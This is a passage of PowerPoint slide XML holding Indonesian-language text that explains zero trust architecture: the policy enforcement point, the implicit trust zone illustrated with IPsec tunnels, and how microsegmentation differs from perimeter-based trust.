              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disetujui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghapus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditolak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicabut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. Proses yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mengimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>penegakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>satu-satunya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>diizinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>berinteraksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> administrator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. Sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>membangun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>akar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kepercayaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> proses-proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>keputusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dirusak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Jalur data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penegakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepercayaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>implisit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hasil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berhasil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terowongan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IPsec yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>agen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditandatangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> digital yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, gateway </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Karena data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> transport IPsec, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pun yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendasarinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sakelar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, router, dan firewall) yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Tujuan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>desain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zero trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepercayaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>implisit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekecil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transaksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> individual. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pendekatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> granular </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>microsegmented</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> perimeter, di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepercayaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diasumsikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setelah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergabung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dalam zero trust, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tempat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bukanlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cukup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempercayai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Demikian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pula, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seorang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diautentikasi</a:t>
